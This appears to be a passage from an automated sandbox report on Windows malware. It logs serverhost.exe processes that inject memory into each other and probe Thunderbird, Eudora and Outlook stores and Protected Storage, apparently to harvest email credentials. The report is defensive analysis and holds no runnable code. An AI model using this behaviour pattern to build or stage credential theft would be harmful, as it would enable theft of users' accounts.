Send HTTP Request headers = 0 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session True 2
Fn
Process #12: serverhost.exe
(Host: 25, Network: 0)
+
Information Value
ID #12
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:25, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:00
OS Process Information
+
Information Value
PID 0xc50
Parent PID 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C54
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000130000 0x00130000 0x0022ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000230000 0x00230000 0x002f7fff Pagefile Backed Memory Readable True False False
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory Readable, Writable True False False
private_0x0000000000520000 0x00520000 0x0061ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000620000 0x00620000 0x00720fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x00730000 0x009fefff Memory Mapped File Readable False False False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
pstorec.dll 0x71ec0000 0x71eccfff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x741c0000 0x741d3fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc20 address = 0x400000, size = 114688 True 1
Fn
Data
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc20 address = 0x7ffdf008, size = 4 True 1
Fn
Data
Modify Control Flow #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc20 os_tid = 0xc54, address = 0x0 True 1
Fn
Host Behavior
File (4)
+
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Profiles type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Thunderbird\Profiles type = file_attributes False 1
Fn
Get Info C:\Program Files\Mozilla Thunderbird type = file_attributes False 1
Fn
Registry (3)
+
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird False 1
Fn
Module (10)
+
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x6eb50000 True 1
Fn
Load shell32.dll base_address = 0x758a0000 True 1
Fn
Load pstorec.dll base_address = 0x71ec0000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 2
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll function = InitCommonControlsEx, address_out = 0x6eb56be6 True 1
Fn
Get Address c:\windows\system32\shell32.dll function = SHGetSpecialFolderPathA, address_out = 0x75aefb26 True 1
Fn
Get Address c:\windows\system32\pstorec.dll function = PStoreCreateInstance, address_out = 0x71ec526c True 1
Fn
System (1)
+
Operation Additional Information Success Count Logfile
Get Info type = Operating System False 1
Fn
Ini (7)
+
Operation Filename Additional Information Success Count Logfile
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Process #13: serverhost.exe
(Host: 54, Network: 0)
+
Information Value
ID #13
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:25, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:00
OS Process Information
+
Information Value
PID 0xc58
Parent PID 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C5C
0x C8C
0x C90
0x C94
0x C98
0x C9C
0x CA8
0x CAC
0x CB0
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
imm32.dll 0x00040000 0x0005cfff Memory Mapped File Readable False False False
private_0x0000000000040000 0x00040000 0x00040fff Private Memory Readable, Writable True False False
pagefile_0x0000000000050000 0x00050000 0x00051fff Pagefile Backed Memory Readable True False False
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False
locale.nls 0x00170000 0x001d6fff Memory Mapped File Readable False False False
pagefile_0x00000000001e0000 0x001e0000 0x002a7fff Pagefile Backed Memory Readable True False False
private_0x00000000002b0000 0x002b0000 0x002b0fff Private Memory Readable, Writable True False False
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
private_0x00000000002e0000 0x002e0000 0x002e9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000002f0000 0x002f0000 0x002fffff Private Memory True False False
private_0x0000000000300000 0x00300000 0x003fffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x00418fff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x0060ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000420000 0x00420000 0x00520fff Pagefile Backed Memory Readable True False False
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False
rpcss.dll 0x00570000 0x005cbfff Memory Mapped File Readable False False False
private_0x0000000000570000 0x00570000 0x0058ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000570000 0x00570000 0x00572fff Pagefile Backed Memory Readable, Writable True False False
tzres.dll 0x00570000 0x00570fff Memory Mapped File Readable False False False
pagefile_0x0000000000570000 0x00570000 0x00570fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000580000 0x00580000 0x0058ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000590000 0x00590000 0x00591fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000005a0000 0x005a0000 0x005a0fff Private Memory Readable, Writable True False False
pagefile_0x00000000005b0000 0x005b0000 0x005b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000005c0000 0x005c0000 0x005c1fff Pagefile Backed Memory Readable True False False
private_0x00000000005d0000 0x005d0000 0x005d0fff Private Memory Readable, Writable True False False
pagefile_0x00000000005e0000 0x005e0000 0x005e6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005f0000 0x005f0000 0x005f1fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000600000 0x00600000 0x0060ffff Private Memory Readable, Writable True False False
private_0x0000000000610000 0x00610000 0x0070ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000610000 0x00610000 0x006eefff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006f0000 0x006f0000 0x006f0fff Pagefile Backed Memory Readable True False False
private_0x0000000000700000 0x00700000 0x0070ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x00710000 0x009defff Memory Mapped File Readable False False False
pagefile_0x00000000009e0000 0x009e0000 0x009e3fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000009f0000 0x009f0000 0x009f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a00000 0x00a00000 0x00a00fff Pagefile Backed Memory Readable True False False
private_0x0000000000a50000 0x00a50000 0x00aeffff Private Memory Readable, Writable True False False
private_0x0000000000af0000 0x00af0000 0x00c2ffff Private Memory Readable, Writable True True False
private_0x0000000000af0000 0x00af0000 0x00b6ffff Private Memory Readable, Writable True False False
private_0x0000000000bf0000 0x00bf0000 0x00c2ffff Private Memory Readable, Writable True False False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001860000 0x01860000 0x0205ffff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000020c0000 0x020c0000 0x021bffff Private Memory Readable, Writable True False False
private_0x00000000021c0000 0x021c0000 0x0226ffff Private Memory Readable, Writable True False False
private_0x0000000002280000 0x02280000 0x0237ffff Private Memory Readable, Writable True False False
private_0x0000000002460000 0x02460000 0x0255ffff Private Memory Readable, Writable True False False
pagefile_0x0000000002560000 0x02560000 0x02d5ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000002d60000 0x02d60000 0x02e60fff Private Memory Readable, Writable True False False
private_0x0000000002d60000 0x02d60000 0x02e5ffff Private Memory Readable, Writable True False False
private_0x0000000002ea0000 0x02ea0000 0x02f9ffff Private Memory Readable, Writable True False False
private_0x0000000002fa0000 0x02fa0000 0x0309ffff Private Memory Readable, Writable True False False
private_0x0000000003140000 0x03140000 0x0323ffff Private Memory Readable, Writable True False False
pagefile_0x0000000003240000 0x03240000 0x03632fff Pagefile Backed Memory Readable True False False
private_0x0000000003640000 0x03640000 0x0378ffff Private Memory Readable, Writable True False False
pagefile_0x0000000003640000 0x03640000 0x0373ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000003780000 0x03780000 0x0378ffff Private Memory Readable, Writable True False False
pagefile_0x0000000003790000 0x03790000 0x03f8ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000005290000 0x05290000 0x0538ffff Private Memory Readable, Writable True False False
private_0x0000000036890000 0x36890000 0x3689ffff Private Memory Readable, Writable, Executable True False False
olmapi32.dll 0x63430000 0x637fefff Memory Mapped File Readable, Writable, Executable False False False
osppc.dll 0x63b00000 0x63b2cfff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x63b30000 0x63cbdfff Memory Mapped File Readable, Writable, Executable False False False
adal.dll 0x63cc0000 0x63d74fff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x64110000 0x68dfafff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x68e00000 0x6a6e3fff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x6bdc0000 0x6c130fff Memory Mapped File Readable, Writable, Executable False False False
d2d1.dll 0x6c200000 0x6c2b9fff Memory Mapped File Readable, Writable, Executable False False False
mspst32.dll 0x6d080000 0x6d217fff Memory Mapped File Readable, Writable, Executable False False False
msadox.dll 0x6d1c0000 0x6d21afff Memory Mapped File Readable, Writable, Executable False False False
msadox.dll 0x6eaf0000 0x6eb4afff Memory Mapped File Readable, Writable, Executable False False False
contab32.dll 0x6f320000 0x6f342fff Memory Mapped File Readable, Writable, Executable False False False
mapir.dll 0x6f350000 0x6f483fff Memory Mapped File Readable, Writable, Executable False False False
davhlpr.dll 0x6f4f0000 0x6f4f7fff Memory Mapped File Readable, Writable, Executable False False False
davclnt.dll 0x6f500000 0x6f516fff Memory Mapped File Readable, Writable, Executable False False False
office.odf 0x70ac0000 0x70fbffff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x71230000 0x71298fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x712a0000 0x7135efff Memory Mapped File Readable, Writable, Executable False False False
dxgi.dll 0x716f0000 0x71772fff Memory Mapped File Readable, Writable, Executable False False False
webio.dll 0x719c0000 0x71a0efff Memory Mapped File Readable, Writable, Executable False False False
winhttp.dll 0x71a10000 0x71a67fff Memory Mapped File Readable, Writable, Executable False False False
msimg32.dll 0x71fc0000 0x71fc4fff Memory Mapped File Readable, Writable, Executable False False False
oleacc.dll 0x729b0000 0x729ebfff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x736e0000 0x736f2fff Memory Mapped File Readable, Writable, Executable False False False
gdiplus.dll 0x73840000 0x739cffff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
powrprof.dll 0x74740000 0x74764fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74940000 0x74948fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75300000 0x75307fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
winsta.dll 0x753b0000 0x753d8fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
wintrust.dll 0x754f0000 0x7551cfff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd7000 0x7ffd7000 0x7ffd7fff Private Memory Readable, Writable True False False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True False False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True False False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True False False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True False False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc30 address = 0x400000, size = 102400 True 1
Fn
Data
Modify Memory #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc30 address = 0x7ffdd008, size = 4 True 1
Fn
Data
Modify Control Flow #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe 0xc30 os_tid = 0xc5c, address = 0x0 True 1
Fn
Host Behavior
COM (1)
+
Operation Class Interface Additional Information Success Count Logfile
Create ED475410-B0D6-11D2-8C3B-00104B2A6676 9240A6CD-AF41-11D2-8C3B-00104B2A6676 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (6)
+
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\C572.tmp desired_access = GENERIC_WRITE True 1
Fn
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Open STD_ERROR_HANDLE True 1
Fn
Write C:\ProgramData\C572.tmp size = 58 True 1
Fn
Data
Write C:\ProgramData\C572.tmp size = 54 True 1
Fn
Data
Registry (3)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = DLLPathEx, data = 67 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = MSIApplicationLCID, data = 77 True 1
Fn
Module (40)
+
Operation Module Additional Information Success Count Logfile
Load advapi32.dll base_address = 0x764f0000 True 1
Fn
Load ole32.dll base_address = 0x77140000 True 1
Fn
Load shell32.dll base_address = 0x758a0000 True 1
Fn
Load C:\PROGRA~1\MICROS~1\Office15\OLMAPI32.DLL base_address = 0x63430000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x76590000 True 1
Fn
Get Handle mscoree.dll False 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsAlloc, address_out = 0x765e418d True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsFree, address_out = 0x765e1f61 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsGetValue, address_out = 0x765e1e16 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsSetValue, address_out = 0x765e76e6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x765e3879 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateEventExW, address_out = 0x765924d8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateSemaphoreExW, address_out = 0x765c2111 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x765d2510 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x765cb009 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadpoolTimer, address_out = 0x772c89be True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x772bc02a True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x772bc0d2 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateThreadpoolWait, address_out = 0x765c3f78 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadpoolWait, address_out = 0x772c8bfb True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseThreadpoolWait, address_out = 0x772bb567 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x772e5998 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x772b2251 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x772b28f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x765c2004 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76619aa9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7661f3cf True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CompareStringEx, address_out = 0x765eebc6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetDateFormatEx, address_out = 0x7662f29f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetLocaleInfoEx, address_out = 0x765c53a5 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetTimeFormatEx, address_out = 0x7662f21a True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x7661f70b True 1
Fn
